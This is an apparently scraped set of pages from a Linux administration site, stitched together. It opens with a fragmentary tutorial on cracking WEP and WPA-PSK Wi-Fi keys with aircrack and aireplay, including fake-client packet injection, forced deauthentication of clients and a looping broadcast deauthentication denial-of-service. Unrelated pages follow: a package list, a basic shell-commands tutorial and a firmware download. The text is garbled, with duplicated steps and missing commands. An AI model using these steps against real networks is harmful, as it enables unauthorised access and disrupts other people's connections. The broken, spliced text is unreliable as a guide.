Documente Academic
Documente Profesional
Documente Cultură
Installation
WEP Attack
1. For this example, a PrismGT card is used. It is recognized as eth0. But other card may be ath0 or something else.
2. Change to monitor mode
# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to only cature unique WEP IVs. It
saves space.
1. We will use airoeplay to inject packets, so we can capture packets easily. Open another console. Copy BSSID and
paste as,
Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. In
this case, setup the periodic re-association delay:
2. Once associated, send packets as following. If you are not associated, you see no send packet.
3. If it stoped sending, you need to associate again. Consider setup of the periodic re-association delay. I used crontab to
re-associate again and again.
1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run
# aircrack -x -0 out.ivs
2. For 104bit WEP needs about one million IVs. You may need one day or more time to capture the packets. However if
you use aireplay and inject, you need only few hours.
3. This is the result. It needed only a quarter a million.
4. Aircrack can also run on Windows but aireplay is not supported though.
1. Once you find the key, as XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX, use it to connect to the WLAN.
1. For this example, PrismGT card is used. It is recognize as eth0. But other card may be ath0 or something.
2. Change to monitor mode
# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE). Capture all packets. Don't specify another 1.
Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows
clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless
clients.
After sending the five deauthentication packets, it starts listening for APR requests with attack 3. The -h option is
necessary and must be the MAC address of an associated client.
3. Mass denial-of-service (MDOS) attack
With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus
preventing clients from staying connected.
3. If you do not have a handshake packet, you cannot continue, so you do aireplay -0 again.
Opening out.cap
Read 154839 packets.
Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which
means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several
days.
Tool OS CPU usage Encryption 802. NIC Support Packet injection My recommendation
Airsnort
Windows High WEP 11b Few Not supported Low
(note)
Airsnort
Linux High WEP 11b Few Not supported Low
(note)
Aircrack
Windows Low WEP, WPA 11a/b/g Many Not supported Mid
(note)
Aircrack Linux Low WEP, WPA 11a/b/g Many Supported! Recommended!
Back
Search
www.grape-info.
Web com
Contents
3. CVS 1.11.17-6
4. user_mode_linux-2.4.18.36um-0
5. dhcp-3.0PL1-23 (DHCPD)
6. samba-2.0.3-19990228 (SMB)
7. quota-3.06-9
8. ppp-2.3.5 (PPP)
9. vnc-3.3.3r2_x86_linux_2.0 (Virtual Network Computing)
10. nfs-utils-0.3.1-13 (NFS)
11. openldap-1.2.9-6 (LDAP)
12. wu-ftpd-2.4.2b16-4 (FTP)
13. irc-2.9.5(IRC)
14. mgetty-1.1.14 (PPP Server)
15. pbeagent-7.0.0-119 (PowerChute Business Edition Agent)
20. Security & Monitoring
1. aide-0.10-51 (IDS)
2. Aircrack 2.3 (WEP, WPA-PSK Creck)
3. AirSnort 0.2.1a (WEP Creck)
4. snort-2.3.3-2 (NDIS, oinkmaster, ACID)
5. Nmap-3.81-4 (port-scanning)
6. Nessus-2.2.3-3 (Vulnerability scanner)
7. ettercap-NG-0.7.1 (sniffer)
8. etherape-0.9.0 (Network Traffic Browser)
9. ipchains-1.3.10-3 (IP Masquarade & Packet Filtering)
10. iptables-1.3.3-3 (IP Masquarade (NAT), Packet Filtering & Transparent Proxy)
11. MAPS RBL (Realtime Blackhole List)
12. ntop-1.2a12 (Network Monitor)
13. openssh-2.3.0p1-4
14. swatch-2.2 (Monitoring system activity)
15. tcp_wrappers-7.6 (Monitor and filter incoming requests)
16. ethereal-0.8.13-1 (Network protocol analyzer)
21. Kernel Configuration
1. kernel2.4.x
2. Using the ext3 filesystem in 2.4 kernels
22. Links
23. Previous Version's Documents
History
Ver Date Description
Search
www.grape-info.
Web com
Basic Commands
1. ls
2. cp
3. mv
4. rm
5. mkdir
6. rmdir
7. cat
8. grep
9. chmod
10. kill
11. passwd
12. man
$ ls
file1 file2 file3
● ls -l
In addition to the name of each file, print the file type, permissions, number of hard links, owner name,
group name, size in bytes, and timestamp (the modification time unless other times are selected).For
files with a time that is more than 6 months old or more than 1 hour into the future, the times.
$ ls -l
total 3
-rw-r--r-- 1 guest users 8 Aug 4 15:56 file1
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3
● ls -lt
Sort directory contents by timestamp instead of alphabetically, with the newest files listed first.
$ ls -lt
total 3
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3
cp - copy files
$ ls
file1 file2 file3
$ cp file1 file4
$ ls
file1 file2 file3 file4
mv - rename files
$ ls
file1 file2 file3 file4
$ mv file4 /tmp
$ ls
file1 file2 file3
$ cd /tmp
[guest@linux /tmp]$ ls
file4
$ ls
file1 file2 file3 file4
$ mv file4 file5
$ ls
file1 file2 file3 file5
rm - remove files
$ ls
file1 file2
$ rm file2
$ ls
file1
$ ls
file1
$ mkdir directory
$ ls -lt
total 2
drwxr-xr-x 2 guest users 1024 Aug 5 11:40 directory/
-rw-r--r-- 1 guest users 8 Aug 4 16:04 file1
$ ls
directory/ file1
$ rmdir directory
$ ls
file1
$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK
$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK
$ cat file2
301 4people 4-DK
302 3people 3-LDK
401 none 2-DK
402 2people 2-DK
$ grep LDK *
file1:202 4people 3-LDK
file2:302 3people 3-LDK
[root@ns public_html]# ls -l
-rw------- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod g+r index.html
[root@ns public_html]# ls -l
-rw-r----- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod 644 index.html
[root@ns public_html]# ls -l
-rw-r--r-- 1 hoge staff 163 Aug 7 22:39 index.html
● EX1)
# ps ax | grep dhcpd
278 ? S 0:00 /usr/sbin/dhcpd
7308 p1 S 0:00 grep dhcpd
# kill 278
# ps ax | grep dhcpd
7310 p1 S 0:00 grep dhcpd
● EX2)
$ passwd
Changing password for guest
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully
man keyword
$ man ls
LS(1) LS(1)
NAME
ls, dir, vdir - list contents of directories
SYNOPSIS
ls [-abcdfgiklmnpqrstuxABCFGLNQRSUX1] [-w cols] [-T cols]
[-I pattern] [--all] [--escape] [--directory] [--inode]
[--kilobytes] [--numeric-uid-gid] [--no-group] [--hide-
control-chars] [--reverse] [--size] [--width=cols] [--tab-
size=cols] [--almost-all] [--ignore-backups] [--classify]
[--file-type] [--full-time] [--ignore=pattern] [--derefer-
ence] [--literal] [--quote-name] [--recursive]
[--sort={none,time,size,extension}] [--format={long,ver-
bose,commas,across,vertical,single-column}]
[--time={atime,access,use,ctime,status}] [--help] [--ver-
sion] [--color[={yes,no,tty}]] [--colour[={yes,no,tty}]]
[name...]
DESCRIPTION
This documentation is no longer being maintained and may
......................................
Back
Search
www.grape-info.
Web com
# /etc/init.d/network restart
Shutting down network interfaces:
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev
01)
eth0 configuration: wlan-bus-pci-0000:02:00.0
done
Shutting down service network . . . . . . . . . . . . .
done.
Hint: you may set mandatory devices in /etc/sysconfig/network/config
Setting up network interfaces:
lo
lo IP address: 127.0.0.1/8
done
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev
01)
eth0 configuration: wlan-bus-pci-0000:02:00.0
SIOCSIFFLAGS: No such file or directory
eth0 (DHCP) . . . . . no IP address yet... backgrounding.
waiting
Setting up service network . . . . . . . . . . . . . .
done.
In /var/log/messages
So I have downloaded the latest firmware for the Linux prism54 driver from http://100h.org/wlan/linux/
prismgt/ into /usr/lib/hotplug/firmware/ and rename it
# cd /usr/lib/hotplug/firmware/
# wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
# mv 1.0.4.3.arm isl3890
Back
Search
www.grape-info.
Web com